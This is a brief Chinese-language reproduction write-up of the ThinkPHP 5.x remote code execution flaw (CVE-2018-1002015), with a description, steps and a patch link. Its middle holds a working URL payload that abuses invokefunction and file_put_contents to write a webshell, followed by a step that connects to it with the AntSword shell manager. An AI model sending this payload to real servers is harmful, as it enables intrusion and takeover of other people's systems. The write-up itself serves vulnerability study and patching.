thinkphp命令执行漏洞(CVE-2018-1002015)

漏洞描述:

ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。

复现过程:

1.访问ip:port

thinkphp命令执行漏洞(CVE-2018-1002015)_第1张图片

2.抓包,修改get请求

Payload

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=

thinkphp命令执行漏洞(CVE-2018-1002015)_第2张图片

3.蚁剑连接

thinkphp命令执行漏洞(CVE-2018-1002015)_第3张图片thinkphp命令执行漏洞(CVE-2018-1002015)_第4张图片

修复建议:

用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

你可能感兴趣的:(web安全,网络安全,python)